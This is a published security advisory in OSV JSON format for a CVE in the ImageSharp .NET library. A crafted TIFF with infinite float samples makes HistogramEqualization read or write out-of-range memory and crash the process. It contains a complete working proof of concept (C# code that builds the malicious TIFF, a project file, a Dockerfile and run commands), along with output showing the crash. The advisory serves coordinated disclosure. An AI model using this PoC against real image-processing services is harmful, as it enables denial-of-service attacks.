{"id":"GHSA-j3p4-wp97-rph4","summary":"ImageSharp: HistogramEqualization uses an unvalidated luminance as an unchecked histogram index","details":"### Summary\n\n`SixLabors.ImageSharp` can terminate a process when an application decodes\nan attacker-supplied 32-bit floating-point TIFF as `Image\u003cHalfVector4\u003e` and applies\n`HistogramEqualization()`. An IEEE positive-infinity TIFF sample reaches a non-finite or otherwise out-of-range\n`HalfVector4` component, depending on the release. The histogram equalization path derives a luminance-based\nhistogram index without validating that result, reaching an unsafe out-of-range\naccess.\n\nThis report covers `HistogramEqualization` only. It does not claim Adaptive\nHistogram Equalization or AutoLevel behavior.\n\n### Affected package and versions\n\n- Package: `SixLabors.ImageSharp` (NuGet)\n- Affected range: `\u003e= 2.0.0, \u003c= 4.1.1`\n- Commit `0815358f9202a78bc7f3b83e19282dc3654b500f` corresponds to release **v4.1.1**.\n\nTIFF decoding first shipped in v2.0.0; v1.0.4 has no TIFF decoder. The unsafe luminance-derived histogram index is present from v2.0.0 through v4.1.1. The positive-infinity TIFF PoC terminates published 2.0.0, 3.1.12, 4.0.0, and 4.1.1 with `AccessViolationException`, while the finite `0.5` control completes on each tested release.\n### Details\n\n[`ColorNumerics.GetBT709Luminance`](https://github.com/SixLabors/ImageSharp/blob/0815358f9202a78bc7f3b83e19282dc3654b500f/src/ImageSharp/Common/Helpers/ColorNumerics.cs#L24-L30) can produce a luminance that does not map to a valid histogram index. [`GrayscaleLevelsRowOperation.Invoke`](https://github.com/SixLabors/ImageSharp/blob/0815358f9202a78bc7f3b83e19282dc3654b500f/src/ImageSharp/Processing/Processors/Normalization/GrayscaleLevelsRowOperation%7BTPixel%7D.cs#L47-L62) then uses that result as an unchecked `Unsafe.Add` offset into the histogram.\n\nThe reproduction reaches this code through the public `HistogramEqualization()` extension. It does not test or claim the Adaptive Histogram Equalization or `AutoLevel` paths.\n\n### Tested environment\n\nThe reproduction uses the DLL in the published NuGet 4.1.1 package:\n\n```text\nSixLabors.ImageSharp.dll SHA-256:\nc50231b527153cd9103acf03536a743958b3d892cc98cf9c05c9bcedef63ba0f\nRuntime: .NET 8.0.30 (linux-arm64)\nSDK: 8.0.424\nOS: Debian GNU/Linux 12 (bookworm), Docker\n```\n\n### Reproduction\n\nBuild the supplied Dockerfile and run the exploit. The harness creates a valid\n8x1 uncompressed, 32-bit IEEE floating-point TIFF whose samples are positive infinity,\ndecodes it through the public API, and invokes `HistogramEqualization()`.\n\nObserved result:\n\n```text\nmode=exploit tiffBytes=166 sample=Infinity\ndecoded=8x1 pixel=\u003cInfinity, Infinity, Infinity, 1\u003e\nFatal error. System.AccessViolationException: Attempted to read or write protected memory.\n...\nat SixLabors.ImageSharp.Processing.Processors.Normalization.GrayscaleLevelsRowOperation`1.Invoke\n...\nat SixLabors.ImageSharp.Processing.HistogramEqualizationExtensions.HistogramEqualization\nDocker exit status: 133\n```\n\nThe control is identical except samples are `0.5`:\n\n```text\nmode=control tiffBytes=166 sample=0.5\ndecoded=8x1 pixel=\u003c0.5, 0.5, 0.5, 1\u003e\ncompleted\nDocker exit status: 0\n```\n\nWhen the same exploit binary was invoked through a shell inside the container,\nthe shell printed `Aborted` and reported status 134. The direct `docker run`\nresult above is the result for the supplied Docker commands.\n\nNo active exploitation is known.\n\n\n### Complete PoC files\n\nProgram.cs:\n\n```csharp\nusing SixLabors.ImageSharp;\nusing SixLabors.ImageSharp.PixelFormats;\nusing SixLabors.ImageSharp.Processing;\n\nstatic class Program\n{\n    private static void AddEntry(List\u003cbyte\u003e ifd, ushort tag, ushort type, uint count, uint value)\n    {\n        ifd.AddRange(BitConverter.GetBytes(tag));\n        ifd.AddRange(BitConverter.GetBytes(type));\n        ifd.AddRange(BitConverter.GetBytes(count));\n        ifd.AddRange(BitConverter.GetBytes(value));\n    }\n\n    // Valid, uncompressed 8x1 grayscale TIFF containing 32-bit IEEE float samples.\n    private static byte[] BuildTiff(float sample)\n    {\n        const int width = 8;\n        const int entries = 10;\n        const int ifdOffset = 8;\n        const int pixelOffset = ifdOffset + 2 + (entries * 12) + 4;\n        List\u003cbyte\u003e file = [0x49, 0x49, 0x2A, 0x00, 0x08, 0x00, 0x00, 0x00];\n        List\u003cbyte\u003e ifd = [];\n        ifd.AddRange(BitConverter.GetBytes((ushort)entries));\n        const ushort Short = 3, Long = 4;\n        AddEntry(ifd, 256, Long, 1, width);             // ImageWidth\n        AddEntry(ifd, 257, Long, 1, 1);                 // ImageLength\n        AddEntry(ifd, 258, Short, 1, 32);               // BitsPerSample\n        AddEntry(ifd, 259, Short, 1, 1);                // Compression = none\n        AddEntry(ifd, 262, Short, 1, 1);                // Photometric = BlackIsZero\n        AddEntry(ifd, 273, Long, 1, pixelOffset);       // StripOffsets\n        AddEntry(ifd, 277, Short, 1, 1);                // SamplesPerPixel\n        AddEntry(ifd, 278, Long, 1, 1);                 // RowsPerStrip\n        AddEntry(ifd, 279, Long, 1, width * 4);         // StripByteCounts\n        AddEntry(ifd, 339, Short, 1, 3);                // SampleFormat = IEEE float\n        ifd.AddRange([0, 0, 0, 0]);\n        file.AddRange(ifd);\n        for (int i = 0; i \u003c width; i++)\n        {\n            file.AddRange(BitConverter.GetBytes(sample));\n        }\n\n        return file.ToArray();\n    }\n\n    private static void Main(string[] args)\n    {\n        string mode = args.FirstOrDefault() ?? \"exploit\";\n        float sample = mode == \"control\" ? 0.5F : float.PositiveInfinity;\n        byte[] tiff = BuildTiff(sample);\n        Console.Error.WriteLine($\"mode={mode} tiffBytes={tiff.Length} sample={sample}\");\n\n        using Image\u003cHalfVector4\u003e image = Image.Load\u003cHalfVector4\u003e(tiff);\n        Console.Error.WriteLine($\"decoded={image.Width}x{image.Height} pixel={image[0, 0].ToScaledVector4()}\");\n        image.Mutate(x =\u003e x.HistogramEqualization());\n        Console.Error.WriteLine(\"completed\");\n    }\n}\n\n```\n\nProject file:\n\n```xml\n\u003cProject Sdk=\"Microsoft.NET.Sdk\"\u003e\n  \u003cPropertyGroup\u003e\n    \u003cOutputType\u003eExe\u003c/OutputType\u003e\n    \u003cTargetFramework\u003enet8.0\u003c/TargetFramework\u003e\n    \u003cImplicitUsings\u003eenable\u003c/ImplicitUsings\u003e\n    \u003cNullable\u003eenable\u003c/Nullable\u003e\n  \u003c/PropertyGroup\u003e\n  \u003c!-- Directly load the DLL packaged by the published NuGet 4.1.1 release. --\u003e\n  \u003cItemGroup\u003e\n    \u003cReference Include=\"SixLabors.ImageSharp\"\u003e\n      \u003cHintPath\u003e/root/.nuget/packages/sixlabors.imagesharp/4.1.1/lib/net8.0/SixLabors.ImageSharp.dll\u003c/HintPath\u003e\n    \u003c/Reference\u003e\n    \u003cReference Include=\"System.IO.Hashing\"\u003e\n      \u003cHintPath\u003e/root/.nuget/packages/system.io.hashing/8.0.0/lib/net8.0/System.IO.Hashing.dll\u003c/HintPath\u003e\n    \u003c/Reference\u003e\n  \u003c/ItemGroup\u003e\n\u003c/Project\u003e\n\n```\n\nDockerfile:\n\n```dockerfile\nFROM mcr.microsoft.com/dotnet/sdk:8.0\nWORKDIR /work\nCOPY j3p4.csproj Program.cs ./\nRUN printf '%s\\n' '\u003cProject Sdk=\"Microsoft.NET.Sdk\"\u003e\u003cPropertyGroup\u003e\u003cTargetFramework\u003enet8.0\u003c/TargetFramework\u003e\u003c/PropertyGroup\u003e\u003cItemGroup\u003e\u003cPackageReference Include=\"SixLabors.ImageSharp\" Version=\"4.1.1\" /\u003e\u003c/ItemGroup\u003e\u003c/Project\u003e' \u003e fetch.csproj \\\n    && dotnet restore fetch.csproj --nologo \\\n    && rm fetch.csproj \\\n    && dotnet build j3p4.csproj -c Release --nologo -v quiet\nENTRYPOINT [\"dotnet\", \"/work/bin/Release/net8.0/j3p4.dll\"]\n\n```\n\nRun:\n\n```sh\ndocker build -t imagesharp-j3p4-poc .\ndocker run --rm imagesharp-j3p4-poc exploit\ndocker run --rm imagesharp-j3p4-poc control\n```","aliases":["CVE-2026-106113"],"modified":"2026-10-07T20:30:05.005402479Z","published":"2026-10-07T20:24:23Z","database_specific":{"cwe_ids":["CWE-787"],"severity":"HIGH","github_reviewed":true,"github_reviewed_at":"2026-10-07T20:24:23Z","nvd_published_at":"2026-10-06T18:16:52Z"},"references":[{"type":"WEB","url":"https://github.com/SixLabors/ImageSharp/security/advisories/GHSA-j3p4-wp97-rph4"},{"type":"ADVISORY","url":"https://nvd.nist.gov/vuln/detail/CVE-2026-106113"},{"type":"WEB","url":"https://github.com/SixLabors/ImageSharp/pull/3187"},{"type":"WEB","url":"https://github.com/SixLabors/ImageSharp/commit/c4c4bf292298c026df470db1a17ff826515fd95d"},{"type":"PACKAGE","url":"https://github.com/SixLabors/ImageSharp"},{"type":"WEB","url":"https://github.com/SixLabors/ImageSharp/releases/tag/v4.1.2"}],"affected":[{"package":{"name":"SixLabors.ImageSharp","ecosystem":"NuGet","purl":"pkg:nuget/SixLabors.ImageSharp"},"ranges":[{"type":"ECOSYSTEM","events":[{"introduced":"2.0.0"},{"fixed":"4.1.2"}]}],"versions":["2.0.0","2.1.0","2.1.1","2.1.10","2.1.11","2.1.12","2.1.13","2.1.2","2.1.3","2.1.4","2.1.5","2.1.6","2.1.7","2.1.8","2.1.9","3.0.0","3.0.1","3.0.2","3.1.0","3.1.1","3.1.10","3.1.11","3.1.12","3.1.2","3.1.3","3.1.4","3.1.5","3.1.6","3.1.7","3.1.8","3.1.9","4.0.0","4.1.0","4.1.1"],"database_specific":{"last_known_affected_version_range":"\u003c= 4.1.1","source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/10/GHSA-j3p4-wp97-rph4/GHSA-j3p4-wp97-rph4.json"}}],"schema_version":"1.9.0","severity":[{"type":"CVSS_V3","score":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"}]}